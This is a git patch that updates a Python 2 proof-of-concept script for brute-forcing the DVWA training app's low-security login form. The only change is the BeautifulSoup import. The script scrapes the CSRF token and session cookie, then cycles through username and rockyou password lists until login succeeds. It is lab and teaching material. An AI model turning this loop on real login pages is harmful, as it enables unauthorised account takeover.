From 1a28abfb440d4125d1402c192458e351c11f0a51 Mon Sep 17 00:00:00 2001 From: Yoga Tian Date: Thu, 9 May 2019 02:19:53 +0800 Subject: [PATCH] Add files via upload --- dvwa-bruteforce-low-http-get.py | 360 ++++++++++++++++---------------- 1 file changed, 180 insertions(+), 180 deletions(-) diff --git a/dvwa-bruteforce-low-http-get.py b/dvwa-bruteforce-low-http-get.py index 358536b..9a50df7 100644 --- a/dvwa-bruteforce-low-http-get.py +++ b/dvwa-bruteforce-low-http-get.py @@ -1,180 +1,180 @@ -#!/usr/bin/python -# Quick PoC template for brute force HTTP GET form -# Target: DVWA v1.10 (Brute Force - Low) -# Date: 2015-10-25 -# Author: g0tmi1k ~ https://blog.g0tmi1k.com/ -# Source: https://blog.g0tmi1k.com/2015/10/dvwa-bruteforce-low/ - -import requests -import sys -import re -from BeautifulSoup import BeautifulSoup - - -# Variables -target = 'http://192.168.1.44/DVWA' -sec_level = 'low' -dvwa_user = 'admin' -dvwa_pass = 'password' -user_list = '/usr/share/seclists/Usernames/top_shortlist.txt' -pass_list = '/usr/share/seclists/Passwords/rockyou.txt' - - -# Value to look for in response header (Whitelisting) -success = 'Welcome to the password protected area' - - -# Get the anti-CSRF token -def csrf_token(): - try: - # Make the request to the URL - print "\n[i] URL: %s/login.php" % target - r = requests.get("{0}/login.php".format(target), allow_redirects=False) - - except: - # Feedback for the user (there was an error) & Stop execution of our request - print "\n[!] csrf_token: Failed to connect (URL: %s/login.php).\n[i] Quitting." % (target) - sys.exit(-1) - - # Extract anti-CSRF token - soup = BeautifulSoup(r.text) - user_token = soup("input", {"name": "user_token"})[0]["value"] - print "[i] user_token: %s" % user_token - - # Extract session information - session_id = re.match("PHPSESSID=(.*?);", r.headers["set-cookie"]) - session_id = session_id.group(1) - print "[i] session_id: %s" % session_id - - return session_id, user_token - - -# Login to DVWA core -def dvwa_login(session_id, user_token): - # POST data - data = { - "username": dvwa_user, - "password": dvwa_pass, - "user_token": user_token, - "Login": "Login" - } - - # Cookie data - cookie = { - "PHPSESSID": session_id, - "security": sec_level - } - - try: - # Make the request to the URL - print "\n[i] URL: %s/login.php" % target - print "[i] Data: %s" % data - print "[i] Cookie: %s" % cookie - r = requests.post("{0}/login.php".format(target), data=data, cookies=cookie, allow_redirects=False) - - except: - # Feedback for the user (there was an error) & Stop execution of our request - print "\n\n[!] dvwa_login: Failed to connect (URL: %s/login.php).\n[i] Quitting." % (target) - sys.exit(-1) - - # Wasn't it a redirect? - if r.status_code != 301 and r.status_code != 302: - # Feedback for the user (there was an error again) & Stop execution of our request - print "\n\n[!] dvwa_login: Page didn't response correctly (Response: %s).\n[i] Quitting." % (r.status_code) - sys.exit(-1) - - # Did we log in successfully? - if r.headers["Location"] != 'index.php': - # Feedback for the user (there was an error) & Stop execution of our request - print "\n\n[!] dvwa_login: Didn't login (Header: %s user: %s password: %s user_token: %s session_id: %s).\n[i] Quitting." % ( - r.headers["Location"], dvwa_user, dvwa_pass, user_token, session_id) - sys.exit(-1) - - # If we got to here, everything should be okay! - print "\n[i] Logged in! (%s/%s)\n" % (dvwa_user, dvwa_pass) - return True - - -# Make the request to-do the brute force -def url_request(username, password, session_id): - # GET data - data = { - "username": username, - "password": password, - "Login": "Login" - } - - # Cookie data - cookie = { - "PHPSESSID": session_id, - "security": sec_level - } - - try: - # Make the request to the URL - #print "\n[i] URL: %s/vulnerabilities/brute/" % target - #print "[i] Data: %s" % data - #print "[i] Cookie: %s" % cookie - r = requests.get("{0}/vulnerabilities/brute/".format(target), params=data, cookies=cookie, allow_redirects=False) - - except: - # Feedback for the user (there was an error) & Stop execution of our request - print "\n\n[!] url_request: Failed to connect (URL: %s/vulnerabilities/brute/).\n[i] Quitting." % (target) - sys.exit(-1) - - # Was it a ok response? - if r.status_code != 200: - # Feedback for the user (there was an error again) & Stop execution of our request - print "\n\n[!] url_request: Page didn't response correctly (Response: %s).\n[i] Quitting." % (r.status_code) - sys.exit(-1) - - # We have what we need - return r.text - - -# Main brute force loop -def brute_force(session_id): - # Load in wordlists files - with open(pass_list) as password: - password = password.readlines() - with open(user_list) as username: - username = username.readlines() - - # Counter - i = 0 - - # Loop around - for PASS in password: - for USER in username: - USER = USER.rstrip('\n') - PASS = PASS.rstrip('\n') - - # Increase counter - i += 1 - - # Feedback for the user - print ("[i] Try %s: %s // %s" % (i, USER, PASS)) - - # Make request - attempt = url_request(USER, PASS, session_id) - #print attempt - - # Check response - if success in attempt: - print ("\n\n[i] Found!") - print "[i] Username: %s" % (USER) - print "[i] Password: %s" % (PASS) - return True - return False - - -# Get initial CSRF token -session_id, user_token = csrf_token() - - -# Login to web app -dvwa_login(session_id, user_token) - - -# Start brute forcing -brute_force(session_id) +#!/usr/bin/python +# Quick PoC template for brute force HTTP GET form +# Target: DVWA v1.10 (Brute Force - Low) +# Date: 2015-10-25 +# Author: g0tmi1k ~ https://blog.g0tmi1k.com/ +# Source: https://blog.g0tmi1k.com/2015/10/dvwa-bruteforce-low/ + +import requests +import sys +import re +from bs4 import BeautifulSoup + + +# Variables +target = 'http://192.168.1.44/DVWA' +sec_level = 'low' +dvwa_user = 'admin' +dvwa_pass = 'password' +user_list = '/usr/share/seclists/Usernames/top_shortlist.txt' +pass_list = '/usr/share/seclists/Passwords/rockyou.txt' + + +# Value to look for in response header (Whitelisting) +success = 'Welcome to the password protected area' + + +# Get the anti-CSRF token +def csrf_token(): + try: + # Make the request to the URL + print "\n[i] URL: %s/login.php" % target + r = requests.get("{0}/login.php".format(target), allow_redirects=False) + + except: + # Feedback for the user (there was an error) & Stop execution of our request + print "\n[!] csrf_token: Failed to connect (URL: %s/login.php).\n[i] Quitting." % (target) + sys.exit(-1) + + # Extract anti-CSRF token + soup = BeautifulSoup(r.text) + user_token = soup("input", {"name": "user_token"})[0]["value"] + print "[i] user_token: %s" % user_token + + # Extract session information + session_id = re.match("PHPSESSID=(.*?);", r.headers["set-cookie"]) + session_id = session_id.group(1) + print "[i] session_id: %s" % session_id + + return session_id, user_token + + +# Login to DVWA core +def dvwa_login(session_id, user_token): + # POST data + data = { + "username": dvwa_user, + "password": dvwa_pass, + "user_token": user_token, + "Login": "Login" + } + + # Cookie data + cookie = { + "PHPSESSID": session_id, + "security": sec_level + } + + try: + # Make the request to the URL + print "\n[i] URL: %s/login.php" % target + print "[i] Data: %s" % data + print "[i] Cookie: %s" % cookie + r = requests.post("{0}/login.php".format(target), data=data, cookies=cookie, allow_redirects=False) + + except: + # Feedback for the user (there was an error) & Stop execution of our request + print "\n\n[!] dvwa_login: Failed to connect (URL: %s/login.php).\n[i] Quitting." % (target) + sys.exit(-1) + + # Wasn't it a redirect? + if r.status_code != 301 and r.status_code != 302: + # Feedback for the user (there was an error again) & Stop execution of our request + print "\n\n[!] dvwa_login: Page didn't response correctly (Response: %s).\n[i] Quitting." % (r.status_code) + sys.exit(-1) + + # Did we log in successfully? + if r.headers["Location"] != 'index.php': + # Feedback for the user (there was an error) & Stop execution of our request + print "\n\n[!] dvwa_login: Didn't login (Header: %s user: %s password: %s user_token: %s session_id: %s).\n[i] Quitting." % ( + r.headers["Location"], dvwa_user, dvwa_pass, user_token, session_id) + sys.exit(-1) + + # If we got to here, everything should be okay! + print "\n[i] Logged in! (%s/%s)\n" % (dvwa_user, dvwa_pass) + return True + + +# Make the request to-do the brute force +def url_request(username, password, session_id): + # GET data + data = { + "username": username, + "password": password, + "Login": "Login" + } + + # Cookie data + cookie = { + "PHPSESSID": session_id, + "security": sec_level + } + + try: + # Make the request to the URL + #print "\n[i] URL: %s/vulnerabilities/brute/" % target + #print "[i] Data: %s" % data + #print "[i] Cookie: %s" % cookie + r = requests.get("{0}/vulnerabilities/brute/".format(target), params=data, cookies=cookie, allow_redirects=False) + + except: + # Feedback for the user (there was an error) & Stop execution of our request + print "\n\n[!] url_request: Failed to connect (URL: %s/vulnerabilities/brute/).\n[i] Quitting." % (target) + sys.exit(-1) + + # Was it a ok response? + if r.status_code != 200: + # Feedback for the user (there was an error again) & Stop execution of our request + print "\n\n[!] url_request: Page didn't response correctly (Response: %s).\n[i] Quitting." % (r.status_code) + sys.exit(-1) + + # We have what we need + return r.text + + +# Main brute force loop +def brute_force(session_id): + # Load in wordlists files + with open(pass_list) as password: + password = password.readlines() + with open(user_list) as username: + username = username.readlines() + + # Counter + i = 0 + + # Loop around + for PASS in password: + for USER in username: + USER = USER.rstrip('\n') + PASS = PASS.rstrip('\n') + + # Increase counter + i += 1 + + # Feedback for the user + print ("[i] Try %s: %s // %s" % (i, USER, PASS)) + + # Make request + attempt = url_request(USER, PASS, session_id) + #print attempt + + # Check response + if success in attempt: + print ("\n\n[i] Found!") + print "[i] Username: %s" % (USER) + print "[i] Password: %s" % (PASS) + return True + return False + + +# Get initial CSRF token +session_id, user_token = csrf_token() + + +# Login to web app +dvwa_login(session_id, user_token) + + +# Start brute forcing +brute_force(session_id)